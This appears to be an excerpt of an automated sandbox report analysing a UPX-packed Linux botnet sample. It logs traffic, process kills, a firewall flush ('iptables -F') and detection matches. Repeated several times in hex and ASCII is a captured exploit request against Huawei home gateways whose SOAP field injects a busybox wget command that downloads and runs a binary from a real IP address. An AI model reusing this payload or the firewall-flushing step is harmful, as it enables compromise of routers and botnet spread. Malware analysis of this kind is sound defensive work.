2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 156.132.235.75
    Source: unknownTCP traffic detected without corresponding DNS query: 197.64.238.75
    Source: unknownTCP traffic detected without corresponding DNS query: 197.169.115.49
    Source: unknownTCP traffic detected without corresponding DNS query: 156.223.17.18
    Source: unknownTCP traffic detected without corresponding DNS query: 41.243.213.175
    Source: unknownTCP traffic detected without corresponding DNS query: 197.162.0.34
    Source: unknownTCP traffic detected without corresponding DNS query: 156.205.100.111
    Source: unknownTCP traffic detected without corresponding DNS query: 156.217.17.76
    Source: unknownTCP traffic detected without corresponding DNS query: 156.236.63.110
    Source: unknownTCP traffic detected without corresponding DNS query: 197.250.231.228
    Source: unknownTCP traffic detected without corresponding DNS query: 156.66.156.222
    Source: unknownTCP traffic detected without corresponding DNS query: 41.187.70.94
    Source: unknownTCP traffic detected without corresponding DNS query: 197.145.181.70
    Source: unknownTCP traffic detected without corresponding DNS query: 156.88.123.182
    Source: unknownTCP traffic detected without corresponding DNS query: 41.4.20.59
    Source: unknownTCP traffic detected without corresponding DNS query: 41.148.250.73
    Source: unknownTCP traffic detected without corresponding DNS query: 156.50.184.22
    Source: unknownTCP traffic detected without corresponding DNS query: 156.9.220.181
    Source: unknownTCP traffic detected without corresponding DNS query: 197.15.78.63
    Source: unknownTCP traffic detected without corresponding DNS query: 41.226.3.102
    Source: unknownTCP traffic detected without corresponding DNS query: 156.33.233.51
    Source: unknownTCP traffic detected without corresponding DNS query: 156.239.48.166
    Source: unknownTCP traffic detected without corresponding DNS query: 197.125.79.166
    Source: unknownTCP traffic detected without corresponding DNS query: 41.45.213.65
    Source: unknownTCP traffic detected without corresponding DNS query: 197.254.225.88
    Source: unknownTCP traffic detected without corresponding DNS query: 41.39.106.97
    Source: unknownTCP traffic detected without corresponding DNS query: 197.61.177.151
    Source: unknownTCP traffic detected without corresponding DNS query: 41.188.169.108
    Source: unknownTCP traffic detected without corresponding DNS query: 156.219.220.143
    Source: unknownTCP traffic detected without corresponding DNS query: 197.46.33.194
    Source: unknownTCP traffic detected without corresponding DNS query: 156.90.119.104
    Source: unknownTCP traffic detected without corresponding DNS query: 197.15.87.149
    Source: unknownTCP traffic detected without corresponding DNS query: 41.72.111.79
    Source: unknownTCP traffic detected without corresponding DNS query: 41.185.178.168
    Source: unknownTCP traffic detected without corresponding DNS query: 156.112.150.242
    Source: unknownTCP traffic detected without corresponding DNS query: 197.53.243.40
    Source: unknownTCP traffic detected without corresponding DNS query: 197.246.254.187
    Source: unknownTCP traffic detected without corresponding DNS query: 41.182.248.223
    Source: unknownTCP traffic detected without corresponding DNS query: 156.204.147.67
    Source: unknownTCP traffic detected without corresponding DNS query: 197.219.77.194
    Source: unknownTCP traffic detected without corresponding DNS query: 41.104.90.28
    Source: unknownTCP traffic detected without corresponding DNS query: 156.60.22.180
    Source: unknownTCP traffic detected without corresponding DNS query: 41.38.175.166
    Source: unknownTCP traffic detected without corresponding DNS query: 197.180.177.204
    Source: unknownTCP traffic detected without corresponding DNS query: 197.199.51.96
    Source: unknownTCP traffic detected without corresponding DNS query: 41.179.58.201
    Source: unknownTCP traffic detected without corresponding DNS query: 197.217.58.0
    Source: unknownTCP traffic detected without corresponding DNS query: 156.94.149.198
    Source: unknownTCP traffic detected without corresponding DNS query: 156.147.188.138
    Source: unknownTCP traffic detected without corresponding DNS query: 156.124.129.249
    Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmpString found in binary or memory: http://23.94.186.250/..23091t/mips;
    Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
    Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
    Source: x86String found in binary or memory: http://upx.sf.net
    Source: x86, 5249.1.0000000095c93fa5.000000003788d25b.rw-.sdmpString found in binary or memory: http://www.cisco.com/go/ciscocp
    Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com

    System Summary:

    barindex
    Sample tries to kill many processes (SIGKILL)Show sources
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 658, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 772, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 789, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 904, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1320, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1389, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1809, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1888, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1983, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 2048, result: successful
    Source: /usr/bin/pkill (PID: 5286)SIGKILL sent: pid: 2258, result: successful
    Source: /usr/bin/pkill (PID: 5286)SIGKILL sent: pid: 4487, result: successful
    Source: LOAD without section mappingsProgram segment: 0xc01000
    Source: x86, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 658, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 772, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 789, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 904, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1320, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1389, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1809, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1888, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 1983, result: successful
    Source: /tmp/x86 (PID: 5253)SIGKILL sent: pid: 2048, result: successful
    Source: /usr/bin/pkill (PID: 5286)SIGKILL sent: pid: 2258, result: successful
    Source: /usr/bin/pkill (PID: 5286)SIGKILL sent: pid: 4487, result: successful
    Source: x86Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: classification engineClassification label: mal96.spre.troj.evad.lin@0/9@2/0

    Data Obfuscation:

    barindex
    Sample is packed with UPXShow sources
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

    Persistence and Installation Behavior:

    barindex
    Deletes all firewall rulesShow sources
    Source: /bin/sh (PID: 5272)Args: iptables -F
    Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
